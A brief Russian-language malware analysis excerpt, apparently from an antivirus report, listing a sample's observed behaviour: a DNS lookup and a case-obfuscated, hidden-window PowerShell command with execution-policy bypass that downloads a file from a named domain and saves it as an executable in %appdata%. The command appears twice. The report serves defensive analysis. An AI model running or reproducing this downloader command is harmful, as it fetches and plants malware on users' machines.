Техническая информация
- http://www.zonedopesa.top/read.php?f=1.if как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWERSHeLL.ExE -exECUTioNPolicY bypASS -noPrOfiLE -WiNdOWstyLe hIdDeN (NEW-oBject sYStem.neT.wEBCLient).dowNloaDfIlE('http://www.zonedopesa.top/read.php?f=1.if','%ApPdATa%.ExE')...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "PoWERSHeLL.ExE -exECUTioNPolicY bypASS -noPrOfiLE -WiNdOWstyLe hIdDeN (NEW-oBject sYStem.neT.wEBCLient).dowNloaDfIlE('http://www.zonedopesa.top/read.php?f=1.if','%ApPdATa%.ExE')...' (со скрытым окном)